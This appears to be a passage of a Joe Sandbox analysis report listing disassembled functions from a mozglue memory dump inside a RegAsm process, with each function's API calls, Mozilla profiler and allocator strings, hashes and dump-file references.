                                                                            • Opcode ID: b355a912c6e30fb287d0eeb86985f1ec966f07de25c4097b7c8b6b6f698508e8
                                                                            • Instruction ID: ea3d8e588e53b9d69e2b5e427e367405ce1dfe0cae8fcb14f3b29f9c0e353a69
                                                                            • Opcode Fuzzy Hash: b355a912c6e30fb287d0eeb86985f1ec966f07de25c4097b7c8b6b6f698508e8
                                                                            • Instruction Fuzzy Hash: 94015EBC705645CFDB00CFE9D698B1673B1BB06319F008129E902D2B90F7B0A409CE59
                                                                            Function 6CC7F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                            Strings
                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                            • API String ID: 2848912005-2840072211
                                                                            • Opcode ID: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                            • Instruction ID: 59aec5b42fcf22e7c4658734fbb2c6a3f8a71c18cde73d1b74f3551bc0d374ee
                                                                            • Opcode Fuzzy Hash: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                            • Instruction Fuzzy Hash: 16F0547D7002049FDE106BE9D89895AB77DEB8629DF000055FA0593B11EB759C058B79
                                                                            Function 6CC40E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,6CC40DF8), ref: 6CC40E82
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC40EA1
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC40EB5
                                                                            • FreeLibrary.KERNEL32 ref: 6CC40EC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                            • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                            • API String ID: 391052410-1680159014
                                                                            • Opcode ID: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                            • Instruction ID: 397ae4df68db93a2b021eb2f472b8f9483f39ca12a48b097a7c036618861d6f6
                                                                            • Opcode Fuzzy Hash: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                            • Instruction Fuzzy Hash: ED01F67C7403829FEF02CFE9D998F4637B5F756319F1085A9E941A2B80F774AC148A1A
                                                                            Function 6CC7F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                            Strings
                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                            • API String ID: 2848912005-753366533
                                                                            • Opcode ID: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                            • Instruction ID: 955aa761d4daec9be374b1bbd7e1032767be0795b111b2fa66af0dd0ca2c9426
                                                                            • Opcode Fuzzy Hash: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                            • Instruction Fuzzy Hash: 3BF0547D200244AFDB106BE9889895AB77DEF8629DF000055FA0593B51EB759C058B79
                                                                            Function 6CC705F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC705FB
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC70616
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC331A7), ref: 6CC7061C
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC331A7), ref: 6CC70627
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _writestrlen
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 2723441310-2186867486
                                                                            • Opcode ID: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                            • Instruction ID: 8448eb741d95dbd6a7c897f767ed284fa9503f13eda64439af8da0f14e1fa635
                                                                            • Opcode Fuzzy Hash: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                            • Instruction Fuzzy Hash: CCE08CE2A0201037F5142296AC8ADFB761CDBC6234F080039FD1D82301F94BAD1A51F6
                                                                            Function 6CC89240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89BAE
                                                                            • free.MOZGLUE(?,?), ref: 6CC89BC3
                                                                            • free.MOZGLUE(?,?), ref: 6CC89BD9
                                                                              • Part of subcall function 6CC893B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC894C8
                                                                              • Part of subcall function 6CC893B0: free.MOZGLUE(6CC89281,?), ref: 6CC894DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: 8079de7fc29dee28cf54a4667e0e4a61803fc541fc9444b9aee8fece22033cb4
                                                                            • Instruction ID: 0bf821cfa3de2235c5314fc1c9a1661df9e5f09f65e77d73e1ba564eed2506b0
                                                                            • Opcode Fuzzy Hash: 8079de7fc29dee28cf54a4667e0e4a61803fc541fc9444b9aee8fece22033cb4
                                                                            • Instruction Fuzzy Hash: C3B1CF71A057048BCB01CF58C8805AFF7F5FFC9328B548629E85AAB741EB31E946CB91
                                                                            Function 6CC405F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                            • Instruction ID: 32884f1deb3cd39dbef57196997e50be86062bd21152c29875512aa4b00f484b
                                                                            • Opcode Fuzzy Hash: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                            • Instruction Fuzzy Hash: 5FA148B4A00745CFDB24CF69C594A9AFBF1BF89304F44866ED84A97B01E730A945CFA0
                                                                            Function 6CC771A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC76060: moz_xmalloc.MOZGLUE(00000024,A68410D1,00000000,?,00000000,?,?,6CC75FCB,6CC779A3), ref: 6CC76078
                                                                            • free.MOZGLUE(-00000001), ref: 6CC772F6
                                                                            • free.MOZGLUE(?), ref: 6CC77311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc
                                                                            • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                            • API String ID: 3009372454-760240034
                                                                            • Opcode ID: 4269efbd4c30d7d396bffd4368222d669c501c375881d53862873657ce95e6d1
                                                                            • Instruction ID: 73198932d10ceda67cebf2c23cff71e575fa2e4bd4baaffbe8b6c2b446984d6f
                                                                            • Opcode Fuzzy Hash: 4269efbd4c30d7d396bffd4368222d669c501c375881d53862873657ce95e6d1
                                                                            • Instruction Fuzzy Hash: C371B571F006198FCB19CF69C8906ADB7F2EF84314F25812DD81AA7B14EB31E946DB90
                                                                            Function 6CC914A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC914C5
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC914E2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC91546
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC915BA
                                                                            • free.MOZGLUE(?), ref: 6CC916B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                            • String ID:
                                                                            • API String ID: 1909280232-0
                                                                            • Opcode ID: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                            • Instruction ID: 8e26460293ed9733fbf94ea2a8bb779337280dd7279f523cafbead84053ff015
                                                                            • Opcode Fuzzy Hash: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                            • Instruction Fuzzy Hash: 6E61EE76A017409FDB118F29C880BDEBBB4BF89308F45851CED8A57711EB30E959CB91
                                                                            Function 6CC8C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC8C1F1
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CC8C293
                                                                            • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC8C29E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: fgetc$memcpy
                                                                            • String ID:
                                                                            • API String ID: 1522623862-0
                                                                            • Opcode ID: 864ab82adef7f4a2357b3e6896b9c44bf932d07bcadd7c8a4b4d1949e338d436
                                                                            • Instruction ID: 920929b216089474a1a7bb252a6a32122ebc0a0c903d15cef3b0c53d6d866a81
                                                                            • Opcode Fuzzy Hash: 864ab82adef7f4a2357b3e6896b9c44bf932d07bcadd7c8a4b4d1949e338d436
                                                                            • Instruction Fuzzy Hash: 3A619C71A02618CFCF15DFA8D8805AFBBB5FF49318F154629E902A7790E731A945CFA0
                                                                            Function 6CC89F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89FDB
                                                                            • free.MOZGLUE(?,?), ref: 6CC89FF0
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A006
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC8A0BE
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A0D5
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A0EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                            • Instruction ID: 9c19301ef556c554c1055d4111ec05caa02896369e989cbeecb3336dbf044415
                                                                            • Opcode Fuzzy Hash: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                            • Instruction Fuzzy Hash: C261A0759096019FC711CF18C48055AB7F5FFC8328F548669E89A9B702EB32E996CBC1
                                                                            Function 6CC8DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8DC60
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC8D38A,?), ref: 6CC8DC6F
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCC1
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCE9
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC8D38A,?), ref: 6CC8DD05
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC8D38A,?), ref: 6CC8DD4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 1842996449-0
                                                                            • Opcode ID: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                            • Instruction ID: f95ab5b4610a31dd541f95dcbf7d8d8831b510fef9ec918727a68d02dc9b95bd
                                                                            • Opcode Fuzzy Hash: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                            • Instruction Fuzzy Hash: 01416DB5A01606CFCB40CF99C88099BBBF5FF89318B65456AE945A7B11E771FC10CB90
                                                                            Function 6CC76590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC76727
                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC767C8
                                                                              • Part of subcall function 6CC84290: memcpy.VCRUNTIME140(?,?,6CC92003,6CC90AD9,?,6CC90AD9,00000000,?,6CC90AD9,?,00000004,?,6CC91A62,?,6CC92003,?), ref: 6CC842C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                            • String ID: data
                                                                            • API String ID: 511789754-2918445923
                                                                            • Opcode ID: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                            • Instruction ID: 4c7fee14074932d8afbb4927f9e725613be66797e8b279bba5f0a1475bae2ffc
                                                                            • Opcode Fuzzy Hash: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                            • Instruction Fuzzy Hash: F2D1BD75A087408FD724CF65C851B9BBBE5EFC5348F10892DE48997B91FB30A849CB62
                                                                            Function 6CC7CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000001), ref: 6CC7CA57
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7CA69
                                                                            • Sleep.KERNEL32 ref: 6CC7CADD
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7CAEA
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC7CAF5
                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC7CB19
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 432163150-0
                                                                            • Opcode ID: 7d02d78f467141439ae84c3e4898b4e6a0cb818677f42f857feb5c8e0ade883c
                                                                            • Instruction ID: d79050ac2998823432c5fe52da4459f5996a51e36e5001a78addb565db5c69d2
                                                                            • Opcode Fuzzy Hash: 7d02d78f467141439ae84c3e4898b4e6a0cb818677f42f857feb5c8e0ade883c
                                                                            • Instruction Fuzzy Hash: CE214731B046098BCB08EF78989506FF7BDFFC6355F808629E845A7680FF7095988791
                                                                            Function 6CC8C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC8C82D
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC8C842
